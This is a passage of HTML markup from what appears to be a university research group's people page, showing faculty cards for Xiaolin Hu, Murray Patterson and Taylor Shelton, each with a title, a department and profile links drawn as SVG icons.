29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c40-outer\">\n            <div data-colibri-id=\"182-c40\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c40 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c41\" class=\"d-block style-973 style-local-182-c41 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/08/hu_new-1.jpg\" class=\"wp-image-1348 style-973-image style-local-182-c41-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c41-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c42\" class=\"h-global-transition-all h-heading style-974 style-local-182-c42 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c42\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Xiaolin Hu</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c43\" class=\"h-text h-text-component style-975 style-local-182-c43 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c44\" class=\"h-text h-text-component style-976 style-local-182-c44 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c45\" class=\"style-977 style-local-182-c45 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://csds.gsu.edu/profile/xiaolin-hu/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=zeU19nAAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c46-outer\">\n            <div data-colibri-id=\"182-c46\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c46 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c47\" class=\"d-block style-973 style-local-182-c47 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-patterson.jpg\" class=\"wp-image-1391 style-973-image style-local-182-c47-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c47-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c48\" class=\"h-global-transition-all h-heading style-974 style-local-182-c48 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c48\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Murray Patterson</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c49\" class=\"h-text h-text-component style-975 style-local-182-c49 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Assistant Professor&nbsp;</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c50\" class=\"h-text h-text-component style-976 style-local-182-c50 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c51\" class=\"style-977 style-local-182-c51 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/murray-patterson-449a947\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/murray-patterson/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=X4J8vAEAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c52-outer\">\n            <div data-colibri-id=\"182-c52\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c52 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c53\" class=\"d-block style-973 style-local-182-c53 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Taylor-shelton_300x300.jpeg\" class=\"wp-image-705 style-973-image style-local-182-c53-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c53-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c54\" class=\"h-global-transition-all h-heading style-974 style-local-182-c54 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c54\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Taylor Shelton</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c55\" class=\"h-text h-text-component style-975 style-local-182-c55 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Assistant Professor</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c56\" class=\"h-text h-text-component style-976 style-local-182-c56 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c57\" class=\"style-977 style-local-182-c57 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/taylor-shelton-28a4b3291\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 